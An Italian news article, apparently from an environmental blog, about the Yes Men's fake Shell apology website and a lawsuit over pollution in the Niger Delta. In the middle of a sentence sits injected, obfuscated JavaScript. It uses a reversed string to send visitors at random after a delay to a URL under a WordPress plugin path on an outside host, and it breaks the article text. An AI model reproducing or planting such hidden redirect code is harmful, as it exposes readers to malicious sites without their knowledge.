Nigeria, la Shell si scusa? L'ultima beffa degli Yes Men

image_pdfimage_print

Fonte: Salva le Foreste – Osservatorio sulle Foreste Primarie
la Royal Dutch Shell è estremamente orgogliosa di essere la prima azienda petrolchimica internazionale di dire pubblicamente: Chiediamo scusa.”
Dopo aver inquinato di petrolio e fumi il le foreste della Nigeria, e fatto uccidere ambientalisti del calibro di Ken Saro-wiwa, la Shell si scusa. Sarà vero?

“La Shell si scusa con tutti gli abitanti della Nigeria Delta del Niger per i molti anni di violazioni dei diritti umani, di cui la Shell assume la piena responsabilità – spiega Bradford Houppe, Vice-Presidente del Comitato Etico dell’impresa –  Le operazioni di Shell nel Delta del Niger devono essere oggetto di una seria, approfondita e umile revisione”.

Insomma, un gr (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande passo avanti verso la responsabilità etica di impresa… Se non fosse che alla Shell, questo Bradford Houppe non lo conosce nessuno. Infatti non esiste.
In occasione dell’Assemblea generale degli azionisti della Shell, prevista martedì 18 maggio a L’Aia, il gruppo inglese The Yes Men hanno messo online un falso sito della compagnia petrolifera, immaginando un’impresa davvero etica. Alla Shell l’arduo compito di smentire gli applausi ricevuti.

Intanto rappresentanti indigeni nigeriani, assieme a Friends of the Earth Olanda, hanno citato in giudizio la Shell all’Aia per crimini ambientali commessi in Nigeria. Si scuserà la Shell?

Il falso sito della Shell: http://shellapologises.com/
La conferenza stampa degli YesMen http://www.youtube.com/watch?v=zciWUOrIUqo&feature=player_embedded
Il processo alla Shell all’Aia: http://www.salvaleforeste.it/201003051067/nigeria-gli-indigeni-presentano-il-contro-alla-shell.html
Il sito degli Yes Men http://theyesmen.org/

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *